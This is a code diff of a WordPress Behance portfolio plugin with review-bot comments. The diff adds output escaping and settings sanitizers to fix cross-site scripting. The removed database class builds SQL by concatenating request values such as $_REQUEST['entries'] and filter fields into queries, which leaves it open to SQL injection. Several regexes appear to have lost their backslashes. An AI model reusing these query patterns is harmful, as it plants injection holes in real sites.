+			    	'show_project_title' => 'yes',
+			    	'show_creative_fields' =>'yes',
+			    	'show_project_by' => 'yes',
+			    	'show_about_project' => 'yes',
+			    	'show_publish_date' => 'yes',
+			    	'show_views' => 'yes',
+			    	'show_appreciations' => 'yes',
+			    	'show_comments' => 'yes',
+			    	'show_tags' => 'yes',
+			    	'show_tools_used' => 'yes',
+			    	'show_copyright_info' => 'yes',
+			    	'eds_bpm_custom_css' => '',
+				    'show_project_comments' => ''
+			        ), self::$advanced_config );
+			}else
+				self::$advanced_config = (array) get_option( EDS_BPM_Config::$advanced_config_key);
+		}
+
+		return self::$advanced_config;
+	}
+
+
+	public static function get_navigation_button_config(){
+		if(self::$navigation_button_config ==null){
+			self::$navigation_button_config = array();
+
+			if(get_option( self::$navigation_button_config_key ) === false){
+				self::$navigation_button_config = array_merge( array(
+						'show_prev_next_btn' => 'yes',
+						'prev_next_project_order' => 'doc',
+						'prev_btn_text' =>'Prev',
+						'prev_btn_text_color' => '#ffffff',
+						'prev_btn_bg_color' => '#333333',
+						'next_btn_text' => 'Next',
+						'next_btn_text_color' => '#ffffff',
+						'next_btn_bg_color' => '#333333',
+						'prev_next_btn_style' => 'default',
+						'prev_next_btn_position' => 'top',
+						'prev_next_btn_icon' => 'yes'
+				), self::$navigation_button_config );
+			}else
+				self::$navigation_button_config = (array) get_option( EDS_BPM_Config::$navigation_button_config_key);
+		}
+
+		return self::$navigation_button_config;
+	}
+
+	public static function get_general_config(){
+		if(self::$general_config ==null){
+
+			self::$general_config = array();
+
+			if(get_option( self::$general_config_key ) === false){
+				self::$general_config = array_merge( array(
+			        'behance_api_key' => '',
+			    	'result_per_page' => self::$result_per_page,
+					'view_project_on_behance' => '',
+					'open_in_different_tab' => 'yes'
+			        ), self::$general_config );
+			}else{
+				self::$general_config = (array) get_option( EDS_BPM_Config::$general_config_key);
+			}
+
+		}
+
+		return self::$general_config;
+	}
+
+
+	public static function get_current_page_url() {
+	 	$pageURL = 'http';
+	 	if (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
+	 	$pageURL .= "://";
+	 	if ($_SERVER["SERVER_PORT"] != "80") {
+	  		$pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
+	 	} else {
+	  		$pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
+	 	}
+	 	return $pageURL;
+	}
+
+	public static function trim_all( $str , $what = NULL , $with = ' ' )
+	{
+	    if( $what === NULL )
+	    {
+	        //  Character      Decimal      Use
+	        //  ""            0           Null Character
+	        //  "t"            9           Tab
+	        //  "n"           10           New line
+	        //  "x0B"         11           Vertical Tab
+	        //  "r"           13           New Line in Mac
+	        //  " "            32           Space
+
+	        $what   = "\x00-\x20";    //all white-spaces and control chars
+	    }
+
+	    return trim( preg_replace( "/[".$what."]+/" , $with , $str ) , $what );
+	}
+
+	public static function is_curl_loaded() {
+    	return extension_loaded( 'curl' );
+  	}
+}
 }
 No newline at end of file
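Review bot: 169 lines removed and re-added unchanged; the same line-ending churn as the earlier full-file hunks, with no functional change in eds-bpm-config.php.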
--- a/portfolio-manager-powered-by-behance/classes/eds-bpm-configuration-manager.php
+++ b/portfolio-manager-powered-by-behance/classes/eds-bpm-configuration-manager.php
@@ -269,7 +269,7 @@
 							$this->advanced_config_key,
 							EDS_BPM_Config::$advanced_section );

-		register_setting( $this->advanced_config_key, $this->advanced_config_key);
+		register_setting( $this->advanced_config_key, $this->advanced_config_key, array($this, 'sanitize_advanced_settings'));
 	}

 	public function section_advanced_desc() {
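Review bot: the new third argument to `register_setting()` is passed as a bare callable (`array($this, 'sanitize_advanced_settings')`). Since WordPress 4.7 that parameter is an `$args` array, and a plain callable is only honoured for backwards compatibility. Prefer `array( 'sanitize_callback' => array( $this, 'sanitize_advanced_settings' ) )` so the intent is explicit and `type`/`default` can be added later; the same applies to the navigation-button registration in the hunk at line 576.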
@@ -482,7 +482,7 @@
 		$html ='<textarea
 					name ="'.$this->advanced_config_key.'[eds_bpm_custom_css]"
 					rows ="5"
-				>'.$value.'</textarea>';
+				>'.esc_textarea($value).'</textarea>';
 		echo $html;
 	}

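Review bot: `esc_textarea()` is the correct escaper for the textarea body, but the `name` attribute two lines above still interpolates `$this->advanced_config_key` into the attribute unescaped. Wrap it in `esc_attr()` for consistency with the value; the two navigation-button text inputs further down (`prev_btn_text`, `next_btn_text`) build their `name` attribute the same way and should get the same treatment.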
@@ -576,7 +576,7 @@
 				$this->navigation_button_config_key,
 				EDS_BPM_Config::$navigation_button_section );

-		register_setting( $this->navigation_button_config_key, $this->navigation_button_config_key);
+		register_setting( $this->navigation_button_config_key, $this->navigation_button_config_key, array($this, 'sanitize_navigation_button_settings'));

 	}

@@ -664,7 +664,7 @@
 		$html ='<input
 					type ="text"
 					name ="'.$this->navigation_button_config_key.'[prev_btn_text]"
-					value="'.$value.'"
+					value="'.esc_attr($value).'"
 				/>';

 		echo $html;
@@ -697,7 +697,7 @@
 		$html ='<input
 					type ="text"
 					name ="'.$this->navigation_button_config_key.'[next_btn_text]"
-					value="'.$value.'"
+					value="'.esc_attr($value).'"
 				/>';

 		echo $html;
@@ -756,10 +756,28 @@
 	    echo '<h2 class="nav-tab-wrapper">';
 	    foreach ( $this->plugin_config_tabs as $tab_key => $tab_caption ) {
 	        $active = $current_tab == $tab_key ? 'nav-tab-active' : '';
-	        echo '<a class="nav-tab ' . $active . '" href="?page=' . $this->slug . '&tab=' . $tab_key . '">' . $tab_caption . '</a>';
+	        echo '<a class="nav-tab ' . esc_attr($active) . '" href="?page=' . esc_attr($this->slug) . '&tab=' . esc_attr($tab_key) . '">' . esc_html($tab_caption) . '</a>';
 	    }
 	    echo '</h2>';
 	}

+	public function sanitize_advanced_settings($input){
+		foreach($input as $key => $value){
+			if($key === 'eds_bpm_custom_css'){
+				$input[$key] = wp_strip_all_tags($value);
+			} else {
+				$input[$key] = sanitize_text_field($value);
+			}
+		}
+		return $input;
+	}
+
+	public function sanitize_navigation_button_settings($input){
+		foreach($input as $key => $value){
+						$input[$key] = sanitize_text_field($value);
+		}
+		return $input;
+	}
+
 }
 }
 No newline at end of file
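Review bot: both new sanitizers iterate `$input` with `foreach` without first checking `is_array($input)`, so a malformed submission yields a PHP warning and `sanitize_text_field()` is then handed a non-string; guard with `if ( ! is_array( $input ) ) { return array(); }` and, since nested arrays would also reach `sanitize_text_field()`, consider `is_scalar($value)` per entry. In the nav-tab line, the `href` is assembled from `esc_attr()`-escaped fragments joined with a bare `&`; building it with `esc_url( add_query_arg( array( 'page' => $this->slug, 'tab' => $tab_key ) ) )` gives a properly encoded URL in one step. Minor: the assignment inside `sanitize_navigation_button_settings()` is over-indented relative to its `foreach`.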
--- a/portfolio-manager-powered-by-behance/classes/eds-bpm-db.php
+++ b/portfolio-manager-powered-by-behance/classes/eds-bpm-db.php
@@ -1,935 +1,939 @@
-<?php
-
-if ( ! defined( 'WPINC' ) ) {
-	die;
-}
-include_once EDS_BPM_Loader::$abs_path. '/classes/eds-bpm-behance.php';
-include_once EDS_BPM_Loader::$abs_path. '/classes/eds-bpm-config.php';
-
-if(!class_exists("EDS_BPM_DB")){
-class EDS_BPM_DB{
-
-	public function create_category_table(){
-		//Creating the category table on activation of plugin
-		global $wpdb;
-		$table_name = $wpdb->prefix . EDS_BPM_Config::$category_table;
-		if($wpdb->get_var("SHOW TABLES LIKE '$table_name'") != $table_name)
-		{
-			$sql = "CREATE TABLE $table_name (
-					  `id` integer(10) UNSIGNED NOT NULL auto_increment,
-					  `name` varchar(255) NOT NULL DEFAULT '',
-					  `slug` varchar(255) NOT NULL DEFAULT '',
-					  `icon` varchar(255) DEFAULT '',
-					  `description` text DEFAULT '',
-					  `status` varchar(20) NOT NULL DEFAULT 'unpublished',
-					  `doc` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
-
-					  PRIMARY KEY (`id`),
-					  UNIQUE KEY `idx_slug` (`slug`(100)),
-					  KEY `idx_status` (`status`),
-					  KEY `idx_doc` (`doc`)
-					) COMMENT='Portfolio Manager - Powered by Behance Categories' AUTO_INCREMENT=0;";
-			//reference to upgrade.php file
-			require_once( ABSPATH . 'wp-admin/includes/upgrade.php' );
-			dbDelta( $sql );
-		}
-	}
-
-	public function create_project_table(){
-		//Creating the project table on actiavation of plugin
-		global $wpdb;
-		$project_table_name = $wpdb->prefix. EDS_BPM_Config::$project_table;
-		$category_table_name = $wpdb->prefix. EDS_BPM_Config::$category_table;
-		if($wpdb->get_var("SHOW TABLES LIKE '$project_table_name'") != $project_table_name)
-		{
-			$sql = "CREATE TABLE $project_table_name (
-					  	`id` integer(10) UNSIGNED NOT NULL auto_increment,
-					  	`catid` integer NOT NULL default '0',
-					  	`slug` varchar (255) NOT NULL DEFAULT '',
-					  	`b_project_id`  varchar(20) NOT NULL DEFAULT '',
-					  	`b_project_url`  varchar(255) NULL DEFAULT '',
-					  	`b_project_name` varchar (255) NOT NULL DEFAULT '',
- 					   	`b_project_thumb` varchar (255) NOT NULL DEFAULT '',
- 						`b_creative_fields` varchar(255) NOT NULL DEFAULT '',
- 						`b_create_date` datetime NOT NULL default '0000-00-00 00:00:00',
- 						`b_modified_timestamp` integer NOT NULL default '0',
- 						`params` text NOT NULL default '',
-					  	`status` varchar(20) NOT NULL DEFAULT 'unpublished',
-					  	`featured` tinyint NOT NULL default '0',
-					  	`doc` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
-					  	PRIMARY KEY (`id`),
-					  	UNIQUE KEY `idx_slug` (`slug`(100)),
-					  	KEY `idx_b_prjct_id` (`b_project_id`),
-   						KEY `idx_status` (`status`),
-   						KEY `idx_catid` (`catid`),
-					  	KEY `idx_doc` (`doc`)
-					) COMMENT='Portfolio Manager - Powered by Behance Projects' AUTO_INCREMENT=0;";
-			//reference to upgrade.php file
-			require_once( ABSPATH . 'wp-admin/includes/upgrade.php' );
-			dbDelta( $sql );
-		}
-
-	}
-
-	public function create_default_category(){
-		try{
-			global $wpdb;
-
-			$table_name = $wpdb->prefix . EDS_BPM_Config::$category_table;
-
-			$row = $wpdb->get_row("SELECT * FROM $table_name WHERE slug='default'", OBJECT, 0);
-
-			if($row != NULL)
-				return;
-
-			$default_cat_icon = plugin_dir_url(__FILE__).'../images/default-category-icon.jpg';
-
-			$wpdb->insert
-			(
-				$table_name,
-				array(
-				            'name' => 'Default',
-							'slug' => 'default',
-				            'icon' => $default_cat_icon,
-				        	'description' => 'Default Category',
-				        	'status' => 'published',
-				        	'doc' =>  date("Y-m-d H:i:s")
-				),
-				array(
-				            '%s',
-				            '%s',
-							'%s',
-				        	'%s',
-				        	'%s',
-			        		'%s'
-				)
-			);
-
-			return true;
-		}catch(Exception $e){
-			return false;
-		}
-	}
-
-
-	//Function to update databse on version change
-	public function update_database() {
-		try{
-			global $wpdb;
-			$behance = new EDS_BPM_Behance();
-
-			$project_table_name = $wpdb->prefix. EDS_BPM_Config::$project_table;
-				$sql = "CREATE TABLE $project_table_name (
-					  	`id` integer(10) UNSIGNED NOT NULL auto_increment,
-					  	`catid` integer NOT NULL default '0',
-					  	`slug` varchar (255) NOT NULL DEFAULT '',
-					  	`b_project_id`  varchar(20) NOT NULL DEFAULT '',
-					  	`b_project_url`  varchar(255) NULL DEFAULT '',
-					  	`b_project_name` varchar (255) NOT NULL DEFAULT '',
- 					   	`b_project_thumb` varchar (255) NOT NULL DEFAULT '',
- 						`b_creative_fields` varchar(255) NOT NULL DEFAULT '',
- 						`b_create_date` datetime NOT NULL default '0000-00-00 00:00:00',
- 						`b_modified_timestamp` integer NOT NULL default '0',
- 						`params` text NOT NULL default '',
-					  	`status` varchar(20) NOT NULL DEFAULT 'unpublished',
-					  	`featured` tinyint NOT NULL default '0',
-					  	`doc` datetime NOT NULL DEFAULT '0000-00-00 00:00:00'
-				);";
-
-				require_once( ABSPATH . 'wp-admin/includes/upgrade.php' );
-
-				dbDelta( $sql );
-
-				$projects = $this->get_all_projects( array( 'id', 'b_project_id' ) );
-
-				if( $projects != null ){
-					$flag = true;
-
-					foreach($projects as $project){
-
-						$be_response = $behance->get_behance_project( $project->b_project_id );
-
-						$b_pr_data = $be_response->data;
-						$status = $be_response->status;
-						$msg = $be_response->msg;
-						if($status=='S')
-							$flag = $flag & $this->_temp_update_project_url($project, $b_pr_data);
-						else{
-							$flag = false;
-						}
-					}
-					return $flag;
-
-				} else {
-					return false;
-				}
-
-		}catch ( Exception $e ) {
-			return false;
-		}
-
-	}
-
-	public function get_all_projects( $columns ) {
-
-		try{
-
-			global $wpdb;
-
-			$table_name = $wpdb->prefix. EDS_BPM_Config::$project_table;
-
-			$columns_list = implode(" , ", $columns);
-
-			$query = "SELECT $columns_list FROM `$table_name` ";
-
-			return $wpdb->get_results( $query ,OBJECT );
-
-		} catch(Exception $e ){
-			return false;
-		}
-
-	}
-
-
-	private function _temp_update_project_url($project, $b_pr_data){
-		try{
-
-			global $wpdb;
-			$tableName = $wpdb->prefix . EDS_BPM_Config::$project_table;
-			$response = $wpdb->update(
-				$tableName,
-				array('b_project_url' => $b_pr_data['url']),
-				array('id' => $project->id),
-				array('%s'),
-				array( '%d')
-			);
-
-			return true;
-
-		}catch(Exception $e){
-			return false;
-		}
-	}
-
-
-	public function get_categories($filters){
-		try{
-			global $wpdb;
-
-			$response = new stdClass();
-
-			$queries = $this->get_category_query($filters);
-
-			$response->rows = $wpdb->get_results( $queries->category_query ,OBJECT );
-			$response->total_rows = ($wpdb->get_col($queries->count_query, 0));
-
-			return $response;
-		}catch(Exception $e){
-			return null;
-		}
-	}
-
-	private function get_category_query($filters){
-		try{
-			global $wpdb;
-
-			$counter = 0;
-			$where_clause = array();
-
-			$category_table = $wpdb->prefix .EDS_BPM_Config::$category_table;
-
-			$query = "SELECT * FROM `$category_table` ";
-			$count_query = "SELECT count(*) as total FROM `$category_table` ";
-
-			if($filters->get_filter_category()!=null && $filters->get_filter_category()!=-1)
-				$where_clause[$counter++] = " name LIKE ('%" . $filters->get_filter_category() . "%')";
-
-			if($filters->get_filter_status()!=null)
-			$where_clause[$counter++] = " status = '" . $filters->get_filter_status() . "'";
-			else
-			$where_clause[$counter++] = " status != 'deleted'";
-
-			$order_by_clause = " ORDER BY " . $filters->get_order_by(). " " . $filters->get_ordering();
-
-			$limit_clause = " LIMIT ".(($filters->get_page_number() - 1) * intval(EDS_BPM_Config::$result_per_page)).",". EDS_BPM_Config::$result_per_page;
-
-			if($counter != 0)
-			{
-				$query .= " WHERE " . implode(' AND ', $where_clause);
-				$count_query .= " WHERE " . implode(' AND ', $where_clause);
-			}
-
-			$query .= $order_by_clause;
-			$query .= $limit_clause;
-
-			$queries = new stdClass();
-
-			$queries->category_query = $query;
-			$queries->count_query = $count_query;
-
-
-			return $queries;
-
-		}catch(Exception $e){
-			return null;
-		}
-	}
-
-	public function get_category_details($cat_id){
-		try{
-			global $wpdb;
-			$category_table = $wpdb->prefix . EDS_BPM_Config::$category_table;
-
-			$query = $wpdb->prepare("SELECT * FROM `$category_table` WHERE id = %d" , $cat_id);
-
-			$category = $wpdb->get_row($query, OBJECT);
-
-			return $category;
-
-		}catch(Exception $e){
-			return null;
-		}
-	}
-
-
-	public function save_category(){
-		try{
-			global $wpdb;
-			$category_table = $wpdb->prefix . EDS_BPM_Config::$category_table;
-
-			$category_slug = $this->get_slug("category",$_REQUEST['cat-name']);
-
-			$response = true;
-
-			// Adding/Updating the Category Table
-			$id = intval($_REQUEST['bpm-id']);
-
-			if($id == 0 ){
-				$response = $wpdb->insert(
-				$category_table,
-				array(
-					            'name' => $_REQUEST['cat-name'],
-								'slug' => $category_slug,
-								'icon' => $_REQUEST['cat-icon'],
-								'description' => $_REQUEST['cat-desc'],
-					        	'status' => 'published',
-					        	'doc' => date("Y-m-d H:i:s")
-				),
-				array(
-					            '%s',
-								'%s',
-								'%s',
-								'%s',
-					        	'%s',
-					        	'%s'
-				));
-			}
-			else{
-				$response = $wpdb->update(
-				$category_table,
-				array(
-					            'name' => $_REQUEST['cat-name'],
-								'slug' => $category_slug,
-								'icon' => $_REQUEST['cat-icon'],
-								'description' => $_REQUEST['cat-desc'],
-				),
-				array(
-								'id' => $id
-				),
-				array(
-					        	'%s',
-								'%s',
-								'%s',
-								'%s'
-				),
-				array( '%d'));
-
-			}
-
-			return true;
-
-		}catch(Exception $e){
-			return false;
-		}
-	}
-
-	private function get_slug($type , $text){
-		try{
-			global $wpdb;
-			$table = '';
-			switch($type){
-				case "category":
-					$table = $wpdb->prefix . EDS_BPM_Config::$category_table;
-				break;
-
-				case "project":
-					$table = $wpdb->prefix . EDS_BPM_Config::$project_table;
-				break;
-			}
-
-			//$name = strtolower(trim($text));
-			//$slug = str_replace(" ","-", $name);
-			$slug = $this->convert_to_slug($text);
-			$new_slug = $slug;
-
-			$count_query = "SELECT count(*) as total FROM `$table` WHERE slug ='$slug'";
-			$total_rows = ($wpdb->get_col($count_query, 0));
-			$counter = 1;
-			while($total_rows[0]){
-				$new_slug = $slug.'-'.$counter++;
-				$count_query = "SELECT count(*) as total FROM `$table` WHERE slug ='$new_slug'";
-				$total_rows = ($wpdb->get_col($count_query, 0));
-			}
-
-			return $new_slug;
-		}catch(Exception $e){
-			return null;
-		}
-	}
-
-	private function convert_to_slug($str, $replace=array(), $delimiter='-'){
-		setlocale(LC_ALL, 'en_US.UTF8');
-		if( !empty($replace) ) {
-			$str = str_replace((array)$replace, ' ', $str);
-		}
-		$str = urldecode($str);
-		$clean = iconv('UTF-8', 'ASCII//TRANSLIT', $str);
-		$clean = preg_replace("%[^-/+|w ]%", '', $clean);
-		$clean = strtolower(trim($clean, '-'));
-		$clean = preg_replace("/[/_|+ -]+/", $delimiter, $clean);
-
-		return $clean;
-	}
-
-
-
-	public function publish_category(){
-		try{
-			global $wpdb;
-			$tableName = $wpdb->prefix . EDS_BPM_Config::$category_table;
-
-			$ids = $_REQUEST['entries'];
-
-			$wpdb->query("UPDATE `$tableName` SET status = 'published' WHERE id IN (".implode(",", $ids).")");
-
-			return true;
-		}catch(Exception $e){
-			return false;
-		}
-	}
-
-	public function unpublish_category(){
-		try{
-			global $wpdb;
-			$tableName = $wpdb->prefix . EDS_BPM_Config::$category_table;
-
-			$ids = $_REQUEST['entries'];
-
-			$wpdb->query("UPDATE `$tableName` SET status = 'unpublished' WHERE id IN (".implode(",", $ids).")");
-
-			return true;
-		}catch(Exception $e){
-			return false;
-		}
-	}
-
-	public function delete_category(){
-		try{
-			global $wpdb;
-			$tableName = $wpdb->prefix . EDS_BPM_Config::$category_table;
-
-			$ids = $_REQUEST['entries'];
-
-			$wpdb->query("UPDATE `$tableName` SET status = 'deleted' WHERE id IN (".implode(",", $ids).")");
-
-			return true;
-		}catch(Exception $e){
-			return false;
-		}
-	}
-
-
-	public function trash_category(){
-		try{
-			global $wpdb;
-			$tableName = $wpdb->prefix . EDS_BPM_Config::$category_table;
-
-			$ids = $_REQUEST['entries'];
-
-			$wpdb->query("DELETE FROM `$tableName` WHERE id IN (".implode(",", $ids).")");
-
-			return true;
-		}catch(Exception $e){
-			return false;
-		}
-	}
-
-
-
-	public function get_projects($filters){
-		try{
-			global $wpdb;
-
-			$response = new stdClass();
-
-			$queries = $this->get_project_query($filters);
-
-			$response->rows = $wpdb->get_results( $queries->project_query ,OBJECT );
-			$response->total_rows = ($wpdb->get_col($queries->count_query, 0));
-			$response->category_list = $this->get_category_list('published');
-
-			return $response;
-		}catch(Exception $e){
-			return null;
-		}
-	}
-
-	private function get_project_query($filters){
-		try{
-			global $wpdb;
-
-			$counter = 0;
-			$where_clause = array();
-
-
-			$project_table = $wpdb->prefix .EDS_BPM_Config::$project_table;
-			$category_table = $wpdb->prefix .EDS_BPM_Config::$category_table;
-
-			$query = "SELECT * FROM `$project_table` p INNER JOIN (SELECT id AS cat_id, name AS cat_name FROM `$category_table`) c ON p.catid = c.cat_id ";
-
-			$count_query = "SELECT count(*) as total FROM `$project_table` p INNER JOIN (SELECT id AS cat_id, name AS cat_name FROM `$category_table`) c ON p.catid = c.cat_id ";
-
-			if($filters->get_filter_pname()!=null && $filters->get_filter_pname()!='')
-			{
-				if(is_numeric(trim($filters->get_filter_pname())))
-					$where_clause[$counter++] = " p.b_project_id = '" . trim($filters->get_filter_pname()) . "'";
-				else
-					$where_clause[$counter++] = " p.b_project_name LIKE ('%" . $filters->get_filter_pname() . "%')";
-			}
-
-
-			if($filters->get_filter_pcategory()!=null && $filters->get_filter_pcategory()!=-1)
-				$where_clause[$counter++] = " c.cat_id = ". $filters->get_filter_pcategory();
-
-			if($filters->get_filter_pstatus()!=null)
-			{
-				if($filters->get_filter_pstatus()!='featured')
-					$where_clause[$counter++] = " p.status = '" . $filters->get_filter_pstatus() . "'";
-				else
-					$where_clause[$counter++] = " p.featured = 1";
-			}
-			else
-				$where_clause[$counter++] = " p.status != 'deleted'";
-
-
-			$order_by_clause = " ORDER BY " . $filters->get_order_by(). " " . $filters->get_ordering();
-
-			$limit_clause = " LIMIT ".(($filters->get_page_number() - 1) * intval(EDS_BPM_Config::$result_per_page)).",". EDS_BPM_Config::$result_per_page;
-
-			if($counter != 0)
-			{
-				$query .= " WHERE " . implode(' AND ', $where_clause);
-				$count_query .= " WHERE " . implode(' AND ', $where_clause);
-			}
-
-			$query .= $order_by_clause;
-			$query .= $limit_clause;
-
-			$queries = new stdClass();
-
-			$queries->project_query = $query;
-			$queries->count_query = $count_query;
-
-
-			return $queries;
-
-		}catch(Exception $e){
-			return null;
-		}
-	}
-
-
-	public function get_category_list($status){
-		try{
-			global $wpdb;
-			$category_table = $wpdb->prefix . EDS_BPM_Config::$category_table;
-
-			$query = '';
-
-			if($status != null)
-				$query = $wpdb->prepare("SELECT * FROM `$category_table` WHERE status = %s" , $status);
-			else
-				$query = $wpdb->prepare("SELECT * FROM `$category_table`");
-
-			$category_list = $wpdb->get_results($query, OBJECT);
-
-			return $category_list;
-
-		}catch(Exception $e){
-			return null;
-		}
-	}
-
-	public function save_project(){
-		try{
-			global $wpdb;
-			$project_table = $wpdb->prefix . EDS_BPM_Config::$project_table;
-
-			$b_project_name = stripslashes( $_REQUEST['b_project_name'] );
-			$project_slug = $this->get_slug("project", $_REQUEST["b_project_name"]);
-
-			$response = true;
-
-			// Adding/Updating the Category Table
-			$id = intval($_REQUEST['bpm-id']);
-
-			if($id == 0 ){
-				$response = $wpdb->insert(
-				$project_table,
-				array(
-								'catid' => $_REQUEST['bpm-project-category'],
-								'slug' => $project_slug,
-					            'b_project_id' => $_REQUEST['b_project_id'],
-								'b_project_url' => substr( $_REQUEST['b_project_url'], 1, -1),
-								'b_project_name' => $b_project_name,
-								'b_project_thumb' => substr( $_REQUEST['b_project_thumb'], 1, -1),
-								'b_creative_fields' => $_REQUEST['b_creative_fields'],
-								'b_create_date' => $_REQUEST['b_create_date'],
-								'b_modified_timestamp' => $_REQUEST['b_modified_timestamp'],
-								'params' => '',
-					        	'status' => $_REQUEST['bpm-project-status'],
-								'featured' => 0,
-					        	'doc' => date("Y-m-d H:i:s")
-				),
-				array(
-					            '%d',
-								'%s',
-								'%s',
-								'%s',
-								'%s',
-					        	'%s',
-					        	'%s',
-					        	'%s',
-								'%s',
-								'%s',
-					        	'%s',
-					        	'%d',
-								'%s'
-				));
-			}
-			else{
-				$response = $wpdb->update(
-				$project_table,
-				array(
-					            'catid' => $_REQUEST['bpm-project-category'],
-								'slug' => $project_slug,
-					            'b_project_id' => $_REQUEST['b_project_id'],
-								'b_project_url' => substr( $_REQUEST['b_project_url'] , 1, -1),
-								'b_project_name' => $b_project_name,
-								'b_project_thumb' => substr( $_REQUEST['b_project_thumb'], 1, -1 ),
-								'b_creative_fields' => $_REQUEST['b_creative_fields'],
-								'b_create_date' => $_REQUEST['b_create_date'],
-								'b_modified_timestamp' => $_REQUEST['b_modified_timestamp'],
-								'params' => '',
-					        	'status' => $_REQUEST['bpm-project-status'],
-								'featured' => 0
-				),
-				array(
-								'id' => $id
-				),
-				array(
-					        	'%d',
-								'%s',
-								'%s',
-								'%s',
-								'%s',
-					        	'%s',
-					        	'%s',
-					        	'%s',
-								'%s',
-								'%s',
-					        	'%s',
-					        	'%d'
-				),
-				array( '%d'));
-
-			}
-
-			return true;
-
-		}catch(Exception $e){
-			return false;
-		}
-	}
-
-	public function get_project_details($project_id){
-		try{
-			global $wpdb;
-			$project_table = $wpdb->prefix . EDS_BPM_Config::$project_table;
-
-			$query = $wpdb->prepare("SELECT * FROM `$project_table` WHERE id = %d" , $project_id);
-
-			$project = $wpdb->get_row($query, OBJECT);
-
-			return $project;
-
-		}catch(Exception $e){
-			return null;
-		}
-	}
-
-	public function publish_project(){
-		try{
-			global $wpdb;
-			$tableName = $wpdb->prefix . EDS_BPM_Config::$project_table;
-
-			$ids = $_REQUEST['entries'];
-
-			$wpdb->query("UPDATE `$tableName` SET status = 'published' WHERE id IN (".implode(",", $ids).")");
-
-			return true;
-		}catch(Exception $e){
-			return false;
-		}
-
-	}
-
-	public function unpublish_project(){
-		try{
-			global $wpdb;
-			$tableName = $wpdb->prefix . EDS_BPM_Config::$project_table;
-
-			$ids = $_REQUEST['entries'];
-
-			$wpdb->query("UPDATE `$tableName` SET status = 'unpublished' WHERE id IN (".implode(",", $ids).")");
-
-			return true;
-		}catch(Exception $e){
-			return false;
-		}
-
-	}
-
-	public function set_project_featured($flag){
-		try{
-			global $wpdb;
-			$tableName = $wpdb->prefix . EDS_BPM_Config::$project_table;
-
-			$ids = $_REQUEST['entries'];
-
-			$wpdb->query("UPDATE `$tableName` SET featured = $flag WHERE id IN (".implode(",", $ids).")");
-
-			return true;
-		}catch(Exception $e){
-			return false;
-		}
-	}
-
-	public function delete_project(){
-		try{
-			global $wpdb;
-			$tableName = $wpdb->prefix . EDS_BPM_Config::$project_table;
-
-			$ids = $_REQUEST['entries'];
-
-			$wpdb->query("UPDATE `$tableName` SET status = 'deleted' WHERE id IN (".implode(",", $ids).")");
-
-			return true;
-		}catch(Exception $e){
-			return false;
-		}
-	}
-
-	public function trash_project(){
-		try{
-			global $wpdb;
-			$tableName = $wpdb->prefix . EDS_BPM_Config::$project_table;
-
-			$ids = $_REQUEST['entries'];
-
-			$wpdb->query("DELETE FROM `$tableName` WHERE id IN (".implode(",", $ids).")");
-
-			return true;
-		}catch(Exception $e){
-			return false;
-		}
-	}
-
-	public function update_project($project, $b_pr_data){
-		try{
-			global $wpdb;
-			$tableName = $wpdb->prefix . EDS_BPM_Config::$project_table;
-
-			$b_project_thumb = '';
-			if(isset($b_pr_data['covers']['404']) && trim($b_pr_data['covers']['404']) != '')
-				$b_project_thumb = $b_pr_data['covers']['404'];
-			else if (isset($b_pr_data['covers']['230']) && trim($b_pr_data['covers']['230']) != '')
-				$b_project_thumb = $b_pr_data['covers']['230'];
-			else if (isset($b_pr_data['covers']['202']) && trim($b_pr_data['covers']['202']) != '')
-				$b_project_thumb = $b_pr_data['covers']['202'];
-			else if (isset($b_pr_data['covers']['115']) && trim($b_pr_data['covers']['115']) != '')
-				$b_project_thumb = $b_pr_data['covers']['115'];
-			else
-				$b_project_thumb = plugin_dir_url(__FILE__).'../images/default-project-thumb.jpg';
-
-			$b_fields ='';
-			foreach ($b_pr_data['fields'] as $b_field){
-				$b_fields = $b_fields. ', ' . $b_field;
-			}
-
-
-			$project_slug = $this->get_slug("project", $b_pr_data['name']);
-
-			$response = $wpdb->update(
-			$tableName,
-			array(
-							'slug' => $project_slug,
-				            'b_project_id' => $b_pr_data['id'],
-							'b_project_url' => $b_pr_data['url'],
-							'b_project_name' => $b_pr_data['name'],
-							'b_project_thumb' => $b_project_thumb,
-							'b_creative_fields' => substr($b_fields, 2),
-							'b_create_date' => date('Y-m-d H:i:s', $b_pr_data['created_on']),
-							'b_modified_timestamp' => $b_pr_data['modified_on']
-			),
-			array(
-							'id' => $project->id
-			),
-			array(
-				        	'%s',
-							'%s',
-							'%s',
-							'%s',
-							'%s',
-				        	'%s',
-				        	'%s',
-				        	'%s'
-			),
-			array( '%d'));
-
-
-
-			return true;
-
-		}catch(Exception $e){
-			return false;
-		}
-	}
-
-	public function get_project_list(){
-		try{
-			global $wpdb;
-			$project_table = $wpdb->prefix . EDS_BPM_Config::$project_table;
-
-			$query = "SELECT id, b_project_name as name FROM `$project_table` WHERE status = 'published'";
-
-			$project_list = $wpdb->get_results($query, ARRAY_A );
-
-			return $project_list;
-
-		}catch(Exception $e){
-			return null;
-		}
-	}
-
-	public function get_layout_category_list(){
-		try{
-			global $wpdb;
-			$category_table = $wpdb->prefix . EDS_BPM_Config::$category_table;
-
-			$query = "SELECT id, name FROM `$category_table` WHERE status = 'published'";
-
-			$category_list = $wpdb->get_results($query, ARRAY_A );
-
-			return $category_list;
-
-		}catch(Exception $e){
-			return null;
-		}
-	}
-
-	public function save_imported_projects( $projects, $mappings) {
-
-		try{
-
-			global $wpdb;
-
-			$tableName = $wpdb->prefix . EDS_BPM_Config::$project_table;
-
-			//getting the existing projects
-			$existingProjects = $wpdb->get_results( "SELECT `b_project_id`, `id` FROM $tableName", 'OBJECT_K' );
-
-			$values = array();
-			$place_holders = array();
-
-			$query = "INSERT INTO $tableName ( `id`, `catid`, `slug`, `b_project_id`, `b_project_url`, `b_project_name`, `b_project_thumb`, `b_creative_fields`, `b_create_date`, `b_modified_timestamp`, `params`, `status`, `featured`, `doc` ) VALUES ";
-
